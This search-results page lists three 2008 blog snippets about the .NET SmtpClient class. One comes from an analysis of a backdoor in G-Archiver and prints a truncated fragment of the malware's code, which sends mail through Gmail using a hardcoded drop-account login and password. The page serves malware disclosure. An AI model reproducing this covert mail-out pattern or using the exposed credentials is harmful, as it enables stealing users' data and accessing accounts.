SEARCH RESULTS
 
Showing 1-3 of 3 records
1
 
Expand article

Simulating Email in .NET

The Article has images
2008-08-01 13:59:01 by keith-brown in Security Briefs
...SmtpClient as I've done in the code below static void Main( string [] args) { // note the use of the MailAddress class // this allows me to specify display names as well as email addresses MailAddress from = new MailAddress( "admin@fabrikam.com" , "Fabrikam Website" ); MailAddress to = new MailAddress( "mari@fabrikam.com" , "Mari Joyce" );...
 
 
 
 
 
Expand article

Backdoor in G-Archiver

2008-03-11 14:02:11 by Chris Wysopal in Zero in a bit
 
...SmtpClient client = new SmtpClient client.Credentials = new NetworkCredential(JTerry79@gmail.com, bilal482 client.Port = 024b client.Host = smtp.gmail.com client.EnableSsl = true client.Send(message catch (Exception This obviously wasnt the smartest backdoor. The writer didnt need to use the same credentials for for his drop account to...
 
 
 
 
 
Expand article

Better exception reporting in ASP.NET part 2

2008-08-04 14:11:14 by keith-brown in Security Briefs
 
...SmtpClient().Send(msg); } private string ComputeEmailBody(WebBaseEvent raisedEvent) { WebRequestErrorEvent errorEvent = raisedEvent as WebRequestErrorEvent; if ( null != errorEvent) return ErrorEventFormattingHelper.FormatRequestErrorEvent(errorEvent); else return raisedEvent.ToString(); } private string ComputeEmailSubject(WebBaseEvent...
 
 
 
 
 
 
Showing 1-3 of 3 records
1
 
TOP SEARCH
Expand / MinimizeClose Widget
  •  
RECENT SEARCH
Expand / Minimize
  •  
RELATED VIDEO
Expand / Minimize
SecurityRatty FAQ
Sergey Zarubin, 31yo
CISSP, CCSP
Moscow, Russia